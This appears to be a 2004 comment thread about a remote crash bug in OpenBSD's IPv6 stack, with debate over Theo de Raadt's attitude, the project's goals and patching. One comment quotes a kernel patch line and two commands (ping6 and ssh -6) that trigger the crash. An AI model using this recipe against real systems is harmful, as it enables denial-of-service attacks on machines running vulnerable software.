The response from TdR shouldn't be
Ok, tell me *WHY* it should be any different. And
when you have figured out one or more reasons why it
should be anything different, match those reason to
the list here:
http://www.openbsd.org/goals.html
If you get any matches, please post them here afterwards.
It is not the goal to conquer all unices, nor to
please you or me or any other users. Neither is it
a goal to produce comments that can't be misinterpreted
out of context either. So what if Theo is an asshoel,
so what if he is blunt, uncharismatic, unfriendly
or not on your list of likeable persons? He doesn't
care for what you like, until you start producing
workable code. And neither do I, but I don't run a
project like that. He does. And he can say what goes
and what doesn't. You (and others) need to figure
out really quickly that it's not about you. They
don't do all that work for you, it's for _them_.
It may come as a shock for you to realise it, but
if you slam the door and never return it wont matter
to them. Really. If the (true - as of now) statement
offends you so much, by all means go somewhere else.
It will not matter. It will not change any facts,
and it will not change openbsd, and it will not change
the trackrecord of openbsd.
-- I'm as unique as everyone else.
...was in windows 9x. But I can undertand this. This is a IPV6 stack, ie: it's likely people is GOING to find bugs in ipv6 stacks. They're too new. It's hard, however, to find such bugs in a IPV4 implementation, just because it has been working for decades. IMHO this is a quite minor bug if you think that the VAST majority of openbsd users are NOT (sadly ;) using ipv6
It does not need to be remote root, to be called a hole, but it does need to have a hole something can get in through. If you can't get in, it's not a hole, but a bug and a crash.
What, writing raw ethernet packets won't work?
tasks(723) drafts(105) languages(484) examples(29106)
I don't see how you'd need to "patch the kernel" or "roll your own network stack" at all. Granted, I don't have a Linux machine available right now and I don't now the inner workings of this exploit, but looking at the "patch" and the two commands issued to carry out the exploit, it looks very much like all you have to do is send an icmp6-packet-too-big to the target (which is trivial with packet sockets in linux and other datalink interfaces in other operating systems, including windows) and then open a tcp connection.
/* we coulnd't care less */ //joro
case ICMPV6_ECHO_REPLY:
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev);
then:
ping6 openbsd
ssh -6 openbsd
The patch just sends an icmp6-packet-too-big when it recieves an echo reply, which it gets from the target after pinging it, and ssh of course just opens a tcp connection.
What about raw sockets?
Now the specialist press, including web sites, who know of the existence of OpenBSD, are likely to treat this in much the same way. A BSD crash, any variant, is a rarity, 1000 times or more less likely to happen than a BSOD. Same sort of ratio fro security holes also. So, the same thing happens, the uncommon major event gets the attention, although it does far, far less harm overall than the very common everyday event.
Of course in this case the normal press remain in utter ignorance, some of them may know that Windoze is not the same as a MAC, a few will know of Linux, and very few indeed will know what BSD is, they probably think it is a shorter abbreviation for BSOD. So, the mainstream press will leave this well alone.
It is quite right and proper that crashes should be reported, and certainly it is only fair that a problem with a secure OS gets to be known, and fixed, but like the train crash, it needs to be kept in perspective.
I know that Theo allegedly has an attitude problem, however those who extrapolate from his remark that it is only a crash to suggest that he does not care are IMHO quite wrong. I think he was only putting the event in its true perspective, as being of slightly less importance than a security breach. I think he does care, very much, that "his" software works properly, that is what drives such people, who could earn much more financial reward elsewhere.
All of this is a matter of seeing the thing in its true perspective. If people did that, no-one at all would use the products of the Convicted Monopolist, and the world would be a very much safer place as regards computer security, and much more productive because there would probably be only one crash for 1000 or even 1000000 BSODs in inferior systems, which are riddled with fundamental design errors.
If they want a system with users, it helps to not turn then away by being rude and dismissive.
Users are good for lots of goals, because users find, report, and sometimes fix bugs.
If they want cooperation from other OS/app writers, it helps to be less competitive. I know these aren't *directly* on the list, but surely they contribute indirectly to the goals.
Just as you defend Theo's right to say things like that, should I not also have the right to call him on his attitude?
I find it hard to believe that anything taken out of context could be worse than what he says in context:
Granted, OpenBSD is his baby.
Is there any way that we could prod Santana to bring his binary patches up to date for 3.3 i386 when the patch is released?
I've already emailed him that I'd send him $50.
...the documentation advises against building your own kernel unless you have a very good reason. They won't support you, either (not that their support will solve all your problems).
C'mon, how many people are running IPv6? I'm sure both of them have upgraded to -current already.
At least mafia-owned pizzarias make excellent pizza. Compare to Bill Gates.
If you are gonna sit there and talk out of your ass about how removing IPv6 from your kernel has any benefit at all, you should back it up. It won't affect performance or security, so wtf is it helping? If you don't use IPv6, nobody can connect via IPv6, and therefore its not any more secure to remove IPv6. In fact, it may be less secure as GENERIC kernels are by far the most widely used and tested, and there could be unintended and unknown issues with ganking out part of the kernel for no fucking reason.
It is not, however, in the default configuration, which is what they generally boast about. Thus, what you said is moot.
http://bsd.slashdot.org/article.pl?sid=04/02/05/20 56234
i net6/ip6_output.c
Remotely Crash OpenBSD
Posted by CowboyNeal on Thu Feb 05, '04 22:49
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/net
CVS log for src/sys/netinet6/ip6_output.c
Revision 1.82 / (download) - annotate - [select for diffs] , Wed Feb 4 08:47:41 2004
Get it?
Haida Manga
No, of course not. I know that they take security seriously at OpenBSD, I just don't think they should be such cocks about it.
Forgetting corporate inertia for a moment, you have the choice of hurried, not thoroughly tested, patches; or waiting weeks while they test it thoroughly.
Think of the sheer number of test cases. You've got how many different versions of Windows still supported. Multiply that by all the apps MSFT sells (e.g.: Office) and all the apps that major corporations also run (e.g. Oracle). Multiply by a few hundred hardware platfroms.
I'm not particulary fond of MSFT myself, but complaining about the speed AND quality of their patches reflects poorly on you.
ay dios mio, carajo cabron
I have, on this very desk right now, a box running a stock, unmodified, out-of-the-box, default install of OpenBSD 3.4, which was just installed a few months ago.
It has IPV6 enabled.
Please look into these things before you post about them.
Doesn't that violate the first rule of security: restrict physical access? If anyone can walk in and access the firewalls/routers, they could do whatever they want to them, OpenBSD or not.
"Those who consume the bulk of goods are those who make them. We must never forget this secret of our prosperity."
I see. Interesting. :)
"Those who consume the bulk of goods are those who make them. We must never forget this secret of our prosperity."
There is a difference between:
"He should do X" and
"I think he shoudl do X to achieve Y".
Especially when Y isn't on the goals.html page.
Yes, more users would seem logical, but it's not one
of the goals. Reread it and you'll see.
-- I'm as unique as everyone else.
See Daniel Harmeier answer.
Basically OpenBSD releases are supported one year (2 releases). i.e. you have to upgrade only any other release. In fact a release is supported for 13 months to give users a 1 month window to upgrade.
At the time of the telnetd exploit (July 2001) the oldest supported release was 2.7 or 2.8 and telnetd had been disabled from the default install between 2.5 and 2.6. So if you used a supported release you were safe. Since upgrades are free and take about one hour there's no reason not to do it once a year...
Um, maybe you haven't seen that Microsoft has been making IE and Outlook Express for Mac since version 3 of Internet Explorer and Outlook Express 4.5. IE is also included in MacOS X installs.
I use to be indecisive, but now I'm not so sure.
But the Mac port of IE is a different codebase.
r l= /archive/en-us/dnarwbgen/html/msdn_unixwin32.asp
Here is an MSDN article from 1998 that tells how MS did it.
http://msdn.microsoft.com/archive/default.asp?u
They used MainSoft's Win32 layer for Unix.
-- Jason